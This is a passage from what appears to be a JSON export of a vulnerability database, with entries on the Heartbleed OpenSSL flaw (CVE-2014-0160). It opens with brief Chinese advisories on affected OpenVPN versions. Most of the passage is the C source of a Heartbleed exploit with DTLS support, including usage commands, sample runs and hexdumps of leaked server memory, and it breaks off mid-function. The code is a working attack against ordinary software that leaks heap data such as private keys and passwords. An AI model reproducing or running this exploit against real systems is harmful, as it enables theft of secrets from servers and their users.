"https://www.seebug.org/vuldb/ssvid-62189", "id": "SSV:62189", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:26:49", "description": "CVE ID:CVE-2014-0160\r\n\r\nOpenVPN\u662f\u4e00\u6b3e\u5f00\u6e90VPN\u5b9e\u73b0\u3002\r\n\r\nOpenVPN\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nOpenVPN 2.x\nOpenVPN 2.3.3-I002\u7248\u672c\u5df2\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttps://openvpn.net/", "published": "2014-04-21T00:00:00", "title": "OpenVPN OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62239", "id": "SSV:62239", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:10:46", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Heartbleed OpenSSL - Information Leak Exploit (2) - DTLS Support", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-86255", "id": "SSV:86255", "sourceData": "\n /* \r\n* CVE-2014-0160 heartbleed OpenSSL information leak exploit\r\n* =========================================================\r\n* This exploit uses OpenSSL to create an encrypted connection\r\n* and trigger the heartbleed leak. The leaked information is\r\n* returned within encrypted SSL packets and is then decrypted \r\n* and wrote to a file to annoy IDS/forensics. The exploit can \r\n* set heartbeat payload length arbitrarily or use two preset \r\n* values for NULL and MAX length. The vulnerability occurs due \r\n* to bounds checking not being performed on a heap value which \r\n* is user supplied and returned to the user as part of DTLS/TLS \r\n* heartbeat SSL extension. All versions of OpenSSL 1.0.1 to \r\n* 1.0.1f are known affected. You must run this against a target \r\n* which is linked to a vulnerable OpenSSL library using DTLS/TLS.\r\n* This exploit leaks upto 65532 bytes of remote heap each request\r\n* and can be run in a loop until the connected peer ends connection.\r\n* The data leaked contains 16 bytes of random padding at the end.\r\n* The exploit can be used against a connecting client or server,\r\n* it can also send pre_cmd's to plain-text services to establish\r\n* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients\r\n* will often forcefully close the connection during large leak\r\n* requests so try to lower your payload request size. \r\n*\r\n* Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g \r\n*\r\n* E.g.\r\n* $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed\r\n* $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ =============================================================\r\n* [ connecting to 192.168.11.23 443/tcp\r\n* [ connected to 192.168.11.23 443/tcp\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=65535\r\n* [ final record type=24, length=16384\r\n* [ wrote 16381 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=16408\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=16384\r\n* [ wrote 16384 bytes of heap to file 'out'\r\n* [ heartbeat returned type=24 length=42\r\n* [ decrypting SSL packet\r\n* [ final record type=24, length=18\r\n* [ wrote 18 bytes of heap to file 'out'\r\n* [ done.\r\n* $ ls -al out\r\n* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out\r\n* $ hexdump -C out\r\n* - snip - snip \r\n*\r\n* Use following example command to generate certificates for clients.\r\n*\r\n* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \\\r\n* -keyout server.key -out server.crt\r\n*\r\n* Debian compile with "gcc heartbleed.c -o heartbleed -Wl,-Bstatic \\\r\n* -lssl -Wl,-Bdynamic -lssl3 -lcrypto" \r\n*\r\n* todo: add udp/dtls support.\r\n*\r\n* - Hacker Fantastic\r\n* http://www.mdsec.co.uk\r\n*\r\n*/\r\n\r\n/* Modified by Ayman Sagy aymansagy @ gmail.com - Added DTLS over UDP support\r\n*\r\n* use -u switch, tested against s_server/s_client version 1.0.1d\r\n* \r\n* # openssl s_server -accept 990 -cert ssl.crt -key ssl.key -dtls1\r\n* ...\r\n* # ./heartbleed -s 192.168.75.235 -p 990 -f eshta -t 1 -u\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ =============================================================\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=1392\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=1336\r\n* [ final record type=24, length=1355\r\n* [ wrote 1352 bytes of heap to file 'eshta'\r\n* \r\n* \r\n* # hexdump -C eshta \r\n* 00000000 00 00 00 00 06 30 f1 95 08 00 00 00 00 00 00 00 |.....0..........|\r\n* 00000010 8c 43 64 ab e3 89 6b fd e3 d3 74 a1 a1 31 8c 35 |.Cd...k...t..1.5|\r\n* 00000020 09 6d b9 e7 08 08 08 08 08 08 08 08 08 a1 65 9f |.m............e.|\r\n* 00000030 ca 13 80 7c a5 88 b0 c9 d5 f6 7b 14 fe ff 00 00 |...|......{.....|\r\n* 00000040 00 00 00 00 00 03 00 01 01 16 fe ff 00 01 00 00 |................|\r\n* 00000050 00 00 00 00 00 40 b5 fd a5 10 da c4 fd fb c7 d2 |.....@..........|\r\n* 00000060 9f 0c 56 4b a9 9c 14 00 00 0c 00 03 00 00 00 00 |..VK............|\r\n* 00000070 00 0c 69 ec c4 d5 f3 38 ae e5 2e 3a 1a 32 f9 30 |..i....8...:.2.0|\r\n* 00000080 7f 61 4c 8c d7 34 f3 02 08 3f 68 01 a9 a7 81 55 |.aL..4...?h....U|\r\n* 00000090 01 c9 03 03 03 03 00 00 0e 31 39 32 2e 31 36 38 |.........192.168|\r\n* 000000a0 2e 37 35 2e 32 33 35 00 23 00 00 00 0f 00 01 01 |.75.235.#.......|\r\n* 000000b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n*\r\n* 00000530 00 00 00 00 00 00 00 00 a5 e2 f5 67 d6 23 85 49 |...........g.#.I|\r\n* 00000540 b3 cc ed c4 d2 74 c8 97 c1 b4 cc |.....t.....|\r\n* 0000054b\r\n* \r\n* \r\n* # openssl s_client -connect localhost:990 -dtls1\r\n* ...\r\n* # ./heartbleed -b localhost -p 990 -u -t 1 -f eshta\r\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\r\n* [ =============================================================\r\n* [ SSL connection using AES256-SHA\r\n* [ <3 <3 <3 heart bleed <3 <3 <3\r\n* [ heartbeat returned type=24 length=1392\r\n* [ decrypting SSL packet\r\n* [ heartbleed leaked length=1336\r\n* [ final record type=24, length=1355\r\n* [ wrote 1352 bytes of heap to file 'eshta'\r\n* \r\n* \r\n* # hexdump -C eshta \r\n* 00000000 00 00 24 4e b7 00 00 00 00 00 00 00 00 18 00 00 |..$N............|\r\n* 00000010 cf d0 5f df c3 64 5f 58 79 17 f8 f7 22 9b 28 6e |.._..d_Xy...".(n|\r\n* 00000020 c0 e7 d6 a3 08 08 08 08 08 08 08 08 08 9b c3 38 |...............8|\r\n* 00000030 2b 32 5f dd 3a d5 0f 83 51 02 2f 70 33 8f cf 82 |+2_.:...Q./p3...|\r\n* 00000040 21 5b cc 25 80 26 f3 29 c8 90 91 ec 5c 83 68 ee |![.%.&.)....\\.h.|\r\n* 00000050 6b 11 0d ad f1 f4 da 9e 13 59 8f 2a 74 f6 d4 35 |k........Y.*t..5|\r\n* 00000060 9e 17 12 7c 2b 6f 9e a8 1e b4 7a 3c a5 ec 18 e0 |...|+o....z<....|\r\n* 00000070 44 b2 51 e4 69 8c 47 29 39 fb 9e b0 dd 5b 05 4d |D.Q.i.G)9....[.M|\r\n* 00000080 db 11 06 7b 1d 08 58 60 ac 34 3f 2d d1 14 c1 b7 |...{..X`.4?-....|\r\n* 00000090 d5 08 59 73 16 28 f8 75 23 f7 85 27 48 be 1f 14 |..Ys.(.u#..'H...|\r\n* 000000a0 fe ff 00 00 00 00 00 00 00 04 00 01 01 16 fe ff |................|\r\n* 000000b0 00 01 00 00 00 00 00 00 00 40 62 1c 02 19 45 5f |.........@b...E_|\r\n* 000000c0 2c a6 89 95 d2 bf 16 c4 8b b7 14 00 00 0c 00 04 |,...............|\r\n* 000000d0 00 00 00 00 00 0c e9 fb 75 02 61 90 be 4d f7 82 |........u.a..M..|\r\n* 000000e0 06 d6 fd 6d 53 a1 d5 44 e0 5a 0d 6a 6a 94 ef e8 |...mS..D.Z.jj...|\r\n* 000000f0 4c 01 4b cb 86 73 03 03 03 03 2d 53 74 61 74 65 |L.K..s....-State|\r\n* 00000100 31 21 30 1f 06 03 55 04 0a 0c 18 49 6e 74 65 72 |1!0...U....Inter|\r\n* 00000110 6e 65 74 20 57 69 64 67 69 74 73 20 50 74 79 20 |net Widgits Pty |\r\n* 00000120 4c 74 64 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 |Ltd0.."0...*.H..|\r\n* 00000130 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 |...........0....|\r\n* 00000140 82 01 01 00 c0 85 26 4a 9d cd f8 5e 46 74 fa 89 |......&J...^Ft..|\r\n* 00000150 e3 7d 58 76 23 ba ba dc b1 35 98 35 a5 ba 53 a1 |.}Xv#....5.5..S.|\r\n* 00000160 5b 37 28 fe f7 d0 02 fc fd c9 e3 b1 ee e6 fe 79 |[7(............y|\r\n* 00000170 86 f8 81 1a 29 29 a9 81 95 1c c9 5c 81 a2 e8 0c |....)).....\\....|\r\n* 00000180 35 b7 cb 67 8a ec 2a d1 73 e6 70 78 53 c8 50 91 |5..g..*.s.pxS.P.|\r\n* 00000190 49 07 db e1 a4 08 7b fb 07 54 48 85 45 c2 38 71 |I.....{..TH.E.8q|\r\n* 000001a0 6a 8a f2 4d a7 ba 1a 86 36 a2 ae bb a1 e1 7c 2c |j..M....6.....|,|\r\n* 000001b0 12 04 ce e5 d1 75 24 94 1c 31 2c 46 b7 76 30 3a |.....u$..1,F.v0:|\r\n* 000001c0 04 79 2f b3 65 74 fb ae c7 10 a5 da a8 2d b6 fd |.y/.et.......-..|\r\n* 000001d0 cf f9 11 fe 38 cd 25 7e 13 75 14 1d 58 92 bb 3f |....8.%~.u..X..?|\r\n* 000001e0 8f 75 d5 52 f7 27 66 ca 5d 55 4d 0a b5 71 a2 16 |.u.R.'f.]UM..q..|\r\n* 000001f0 3e 01 af 97 93 eb 5c 3f e0 fa c8 61 2c a1 87 8f |>.....\\?...a,...|\r\n* 00000200 60 d4 df 5d 9d cd 0f 34 a9 66 6c 93 d8 5f 4a 2b |`..]...4.fl.._J+|\r\n* 00000210 fd 67 3a 2f 88 90 b4 e9 f5 d6 ee bb 7d 8b 1c e5 |.g:/........}...|\r\n* 00000220 f2 cc 4f b2 c0 dc e8 1b 4c 6e 51 c9 47 8b 6c 82 |..O.....LnQ.G.l.|\r\n* 00000230 f9 4b ae 01 a8 f9 6c 6d d5 1a d5 cf 63 f4 7f e0 |.K....lm....c...|\r\n* 00000240 96 54 3f 7d 02 03 01 00 01 a3 50 30 4e 30 1d 06 |.T?}......P0N0..|\r\n* 00000250 03 55 1d 0e 04 16 04 14 af 97 4e 87 62 8a 77 b8 |.U........N.b.w.|\r\n* 00000260 b4 0b 24 20 35 b1 66 09 55 3f 74 1d 30 1f 06 03 |..$ 5.f.U?t.0...|\r\n* 00000270 55 1d 23 04 18 30 16 80 14 af 97 4e 87 62 8a 77 |U.#..0.....N.b.w|\r\n* 00000280 b8 b4 0b 24 20 35 b1 66 09 55 3f 74 1d 30 0c 06 |...$ 5.f.U?t.0..|\r\n* 00000290 03 55 1d 13 04 05 30 03 01 01 ff 30 0d 06 09 2a |.U....0....0...*|\r\n* 000002a0 86 48 86 f7 0d 01 01 05 05 00 03 82 01 01 00 b0 |.H..............|\r\n* 000002b0 8e 40 58 2d 86 32 95 11 a7 a1 64 1d fc 08 8d 87 |.@X-.2....d.....|\r\n* 000002c0 18 d3 5d c6 a0 bb 84 4a 50 f5 27 1c 15 4b 02 0c |..]....JP.'..K..|\r\n* 000002d0 49 1f 2d 0a 52 d3 98 6b 71 3d b9 0f 36 24 d3 77 |I.-.R..kq=..6$.w|\r\n* 000002e0 e0 d0 a5 50 e5 ea 2d 67 11 69 4d 45 52 97 4d 58 |...P..-g.iMER.MX|\r\n* 000002f0 de 22 06 02 6d 21 80 2f 0d 1c d5 d5 80 5c 8f 44 |."..m!./.....\\.D|\r\n* 00000300 1e b6 f3 41 4c dc d3 40 8d 54 ac b0 ca 8f 19 6a |...AL..@.T.....j|\r\n* 00000310 4d f2 fb ad 68 5a 99 19 ca ae b2 f5 54 70 29 96 |M...hZ......Tp).|\r\n* 00000320 84 7e ba a9 6b 42 e6 68 32 dc 65 87 b1 b7 17 22 |.~..kB.h2.e...."|\r\n* 00000330 e3 cc 62 97 e4 fa 64 0b 1e 70 bf e5 a2 40 e4 49 |..b...d..p...@.I|\r\n* 00000340 24 f9 05 3f 2e fe 7c 38 56 39 4d bd 51 63 0d 79 |$..?..|8V9M.Qc.y|\r\n* 00000350 85 c0 4b 1a 46 64 e0 fe a8 87 bf c7 4d 21 cb 79 |..K.Fd......M!.y|\r\n* 00000360 37 e7 a6 e3 6c 3b ed 35 17 73 7a 71 c6 72 2f bb |7...l;.5.szq.r/.|\r\n* 00000370 58 dc ef e9 1e a3 89 5e 70 cd 95 10 87 c1 8a 7e |X......^p......~|\r\n* 00000380 e7 51 c2 22 67 66 ee 22 f9 a5 2e 31 f2 ad fc 3b |.Q."gf."...1...;|\r\n* 00000390 98 c8 30 63 ef 74 b5 4e c4 bd c7 a2 46 0a b8 bf |..0c.t.N....F...|\r\n* 000003a0 df a8 54 0e 4f 37 d0 a5 27 a3 f3 a7 28 38 3f 16 |..T.O7..'...(8?.|\r\n* 000003b0 fe ff 00 00 00 00 00 00 00 02 00 0c 0e 00 00 00 |................|\r\n* 000003c0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n* 000003d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n* *\r\n* 00000530 00 00 00 00 00 00 00 00 82 8f be ff cf 26 12 9d |.............&..|\r\n* 00000540 a2 de 0c 44 21 4a 54 be 41 4c df |...D!JT.AL.|\r\n* 0000054b\r\n* \r\n*/\r\n#include <stdio.h>\r\n#include <stdint.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <getopt.h>\r\n#include <signal.h>\r\n#include <netdb.h>\r\n#include <fcntl.h>\r\n#include <errno.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n#include <inttypes.h>\r\n#include <openssl/bio.h>\r\n#include <openssl/ssl.h>\r\n#include <openssl/err.h>\r\n#include <openssl/evp.h>\r\n#include <openssl/tls1.h>\r\n#include <openssl/rand.h>\r\n#include <openssl/buffer.h>\r\n\r\n#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \\\r\n\t\t(((unsigned int)(c[1])) )),c+=2)\r\n#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \\\r\n\t\t c[1]=(unsigned char)(((s) )&0xff)),c+=2)\r\n\r\nint first = 0;\r\nint leakbytes = 0;\r\nint repeat = 1;\r\nint badpackets = 0;\r\n\r\ntypedef struct {\r\n\tint socket;\r\n\tSSL *sslHandle;\r\n\tSSL_CTX *sslContext;\r\n} connection;\r\n\r\ntypedef struct {\r\n unsigned char type;\r\n short version;\r\n unsigned int length;\r\n unsigned char hbtype;\r\n unsigned int payload_length;\r\n void* payload;\r\n} heartbeat;\r\n\r\nvoid ssl_init();\r\nvoid usage();\r\nint tcp_connect(char*,int);\r\nint tcp_bind(char*, int);\r\nconnection* tls_connect(int);\r\nconnection* tls_bind(int);\r\nint pre_cmd(int,int,int);\r\nvoid* heartbleed(connection* ,unsigned int);\r\nvoid* sneakyleaky(connection* ,char*, int);\r\n\r\nstatic DTLS1_BITMAP *dtls1_get_bitmap(SSL *s, SSL3_RECORD *rr, unsigned int *is_next_epoch);\r\nstatic int dtls1_record_replay_check(SSL *s, DTLS1_BITMAP *bitmap);\r\nstatic int dtls1_buffer_record(SSL *s, record_pqueue *q, unsigned char *priority);\r\nstatic void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap);\r\n\r\nint tcp_connect(char* server,int port){\r\n\tint sd,ret;\r\n\tstruct hostent *host;\r\n struct sockaddr_in sa;\r\n host = gethostbyname(server);\r\n sd = socket(AF_INET, SOCK_STREAM, 0);\r\n if(sd==-1){\r\n\t\tprintf("[!] cannot create socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tsa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n bzero(&(sa.sin_zero),8);\r\n\tprintf("[ connecting to %s %d/tcp\\n",server,port);\r\n ret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr));\r\n\tif(ret==0){\r\n\t\tprintf("[ connected to %s %d/tcp\\n",server,port);\r\n\t}\r\n\telse{\r\n\t\tprintf("[!] FATAL: could not connect to %s %d/tcp\\n",server,port);\r\n\t\texit(0);\r\n\t}\r\n\treturn sd;\r\n}\r\n\r\nint tcp_bind(char* server, int port){\r\n\tint sd, ret, val=1;\r\n\tstruct sockaddr_in sin;\r\n\tstruct hostent *host;\r\n\thost = gethostbyname(server);\r\n\tsd=socket(AF_INET,SOCK_STREAM,0);\r\n\tif(sd==-1){\r\n \t\tprintf("[!] cannot create socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tmemset(&sin,0,sizeof(sin));\r\n\tsin.sin_addr=*((struct in_addr *) host->h_addr);\r\n\tsin.sin_family=AF_INET;\r\n\tsin.sin_port=htons(port);\r\n \tsetsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val));\r\n\tret = bind(sd,(struct sockaddr *)&sin,sizeof(sin));\r\n\tif(ret==-1){\r\n\t\tprintf("[!] cannot bind socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tlisten(sd,5);\r\n\treturn(sd);\r\n}\r\n\r\nconnection* dtls_server(int sd, char* server,int port){\r\n\tint bytes;\r\n connection *c;\r\n char* buf;\r\n\tbuf = malloc(4096);\r\n\tint ret;\r\n\tstruct hostent *host;\r\n struct sockaddr_in sa;\r\n\tunsigned long addr;\r\n if ((host = gethostbyname(server)) == NULL) {\r\n\t\tperror("gethostbyname");\r\n\t\texit(1);\r\n\t}\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd==-1){\r\n\t\tprintf("[!] cannot create socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tsa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n\tif (bind(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) {\r\n\t\tperror("bind()");\r\n\t\texit(1);\r\n\t}\r\n\r\n\tBIO *bio;\r\n if(c==NULL){\r\n\t\tprintf("[ error in malloc()\\n");\r\n\t\texit(0);\r\n\t}\r\n if(buf==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tmemset(buf,0,4096);\r\n\tc = malloc(sizeof(connection));\r\n\tif(c==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tc->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(DTLSv1_server_method());\r\n\tSSL_CTX_set_read_ahead (c->sslContext, 1);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n\tSSL_CTX_SRP_CTX_init(c->sslContext);\r\n\tSSL_CTX_use_certificate_file(c->sslContext, "./server.crt", SSL_FILETYPE_PEM);\r\n\tSSL_CTX_use_PrivateKey_file(c->sslContext, "./server.key", SSL_FILETYPE_PEM); \r\n\tif(!SSL_CTX_check_private_key(c->sslContext)){\r\n\t\tprintf("[!] FATAL: private key does not match the certificate public key\\n");\r\n\t\texit(0);\r\n\t}\r\n\tc->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n bio = BIO_new_dgram(sd, BIO_NOCLOSE);\r\n\r\n SSL_set_bio(c->sslHandle, bio, bio);\r\n SSL_set_accept_state (c->sslHandle);\r\n\r\n int rc = SSL_accept(c->sslHandle);\r\n\tprintf ("[ SSL connection using %s\\n", SSL_get_cipher (c->sslHandle));\r\n//\tbytes = SSL_read(c->sslHandle, buf, 4095);\r\n//\tprintf("[ recieved: %d bytes - showing output\\n%s\\n[\\n",bytes,buf);\r\n\tif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf("[ warning: heartbeat extension is unsupported (try anyway)\\n");\r\n }\r\n return c;\r\n}\r\n\r\nvoid ssl_init(){\r\n SSL_load_error_strings();\r\n SSL_library_init();\r\n OpenSSL_add_all_digests();\r\n OpenSSL_add_all_algorithms();\r\n OpenSSL_add_all_ciphers();\r\n}\r\n\r\nconnection* tls_connect(int sd){\r\n connection *c;\r\n\tc = malloc(sizeof(connection));\r\n if(c==NULL){\r\n\t\tprintf("[ error in malloc()\\n");\r\n\t\texit(0);\r\n\t}\r\n\tc->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(SSLv23_client_method());\r\n\tSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n c->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n if(SSL_connect(c->sslHandle)!=1)\r\n ERR_print_errors_fp(stderr);\r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf("[ warning: heartbeat extension is unsupported (try anyway)\\n");\r\n }\r\n\treturn c;\r\n}\r\n\r\nconnection* dtls_client(int sd, char* server,int port){\r\n\tint ret;\r\n\tstruct hostent *host;\r\n struct sockaddr_in sa;\r\n connection *c;\r\n\tmemset((char *)&sa,0,sizeof(sa));\r\n\tc = malloc(sizeof(connection));\r\n if ((host = gethostbyname(server)) == NULL) {\r\n\t\tperror("gethostbyname");\r\n\t\texit(1);\r\n\t}\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd==-1){\r\n\t\tprintf("[!] cannot create socket\\n");\r\n\t\texit(0);\r\n\t}\r\n\tsa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = *((struct in_addr *) host->h_addr);\r\n\tif (connect(sd, (struct sockaddr *) &sa ,sizeof(struct sockaddr_in)) < 0) {\r\n\t\tperror("connect()");\r\n\t\texit(0);\r\n\t}\r\n\r\n\tBIO *bio;\r\n if(c==NULL){\r\n\t\tprintf("[ error in malloc()\\n");\r\n\t\texit(0);\r\n\t}\r\n\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(DTLSv1_client_method());\r\n\tSSL_CTX_set_read_ahead (c->sslContext, 1);\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n\r\n\tc->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslHandle = SSL_new(c->sslContext);\r\n\tSSL_set_tlsext_host_name(c->sslHandle,server);\r\n\tbio = BIO_new_dgram(sd, BIO_NOCLOSE);\r\n\r\n\tBIO_ctrl_set_connected(bio, 1, &sa);\r\n\tSSL_set_bio(c->sslHandle, bio, bio);\r\n\tSSL_set_connect_state (c->sslHandle);\r\n//printf("eshta\\n");\r\n if(SSL_connect(c->sslHandle)!=1) \r\n ERR_print_errors_fp(stderr);\r\n\r\n if(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf("[ warning: heartbeat extension is unsupported (try anyway), %d \\n",c->sslHandle->tlsext_heartbeat);\r\n }\r\n\treturn c;\r\n}\r\n\r\nconnection* tls_bind(int sd){\r\n\tint bytes;\r\n connection *c;\r\n char* buf;\r\n\tbuf = malloc(4096);\r\n if(buf==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tmemset(buf,0,4096);\r\n\tc = malloc(sizeof(connection));\r\n\tif(c==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tc->socket = sd;\r\n c->sslHandle = NULL;\r\n c->sslContext = NULL;\r\n c->sslContext = SSL_CTX_new(SSLv23_server_method());\r\n if(c->sslContext==NULL)\r\n ERR_print_errors_fp(stderr);\r\n\tSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);\r\n\tSSL_CTX_SRP_CTX_init(c->sslContext);\r\n\tSSL_CTX_use_certificate_file(c->sslContext, "./server.crt", SSL_FILETYPE_PEM);\r\n\tSSL_CTX_use_PrivateKey_file(c->sslContext, "./server.key", SSL_FILETYPE_PEM); \r\n\tif(!SSL_CTX_check_private_key(c->sslContext)){\r\n\t\tprintf("[!] FATAL: private key does not match the certificate public key\\n");\r\n\t\texit(0);\r\n\t}\r\n\tc->sslHandle = SSL_new(c->sslContext);\r\n if(c->sslHandle==NULL)\r\n ERR_print_errors_fp(stderr);\r\n if(!SSL_set_fd(c->sslHandle,c->socket))\r\n ERR_print_errors_fp(stderr);\r\n int rc = SSL_accept(c->sslHandle);\r\n\tprintf ("[ SSL connection using %s\\n", SSL_get_cipher (c->sslHandle));\r\n\tbytes = SSL_read(c->sslHandle, buf, 4095);\r\n\tprintf("[ recieved: %d bytes - showing output\\n%s\\n[\\n",bytes,buf);\r\n\tif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||\r\n c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){\r\n printf("[ warning: heartbeat extension is unsupported (try anyway)\\n");\r\n }\r\n return c;\r\n}\r\n\r\nint pre_cmd(int sd,int precmd,int verbose){\r\n\t/* this function can be used to send commands to a plain-text\r\n\tservice or client before heartbleed exploit attempt. e.g. STARTTLS */\r\n\tint rc, go = 0;\r\n\tchar* buffer;\r\n\tchar* line1;\r\n\tchar* line2; \r\n\tswitch(precmd){\r\n\t\tcase 0:\r\n\t\t\tline1 = "EHLO test\\n";\r\n\t\t\tline2 = "STARTTLS\\n";\r\n\t\t\tbreak;\r\n\t\tcase 1:\r\n\t\t\tline1 = "CAPA\\n";\r\n\t\t\tline2 = "STLS\\n";\r\n\t\t\tbreak;\r\n\t\tcase 2:\r\n\t\t\tline1 = "a001 CAPB\\n";\r\n\t\t\tline2 = "a002 STARTTLS\\n";\r\n\t\t\tbreak;\r\n\t\tdefault:\r\n\t\t\tgo = 1;\r\n\t\t\tbreak;\r\n\t}\r\n\tif(go==0){\r\n\t\tbuffer = malloc(2049);\r\n\t if(buffer==NULL){\r\n \tprintf("[ error in malloc()\\n");\r\n \texit(0);\r\n\t }\r\n\t\tmemset(buffer,0,2049);\r\n\t\trc = read(sd,buffer,2048);\r\n\t\tprintf("[ banner: %s",buffer);\r\n\t\tsend(sd,line1,strlen(line1),0);\r\n\t\tmemset(buffer,0,2049);\r\n\t\trc = 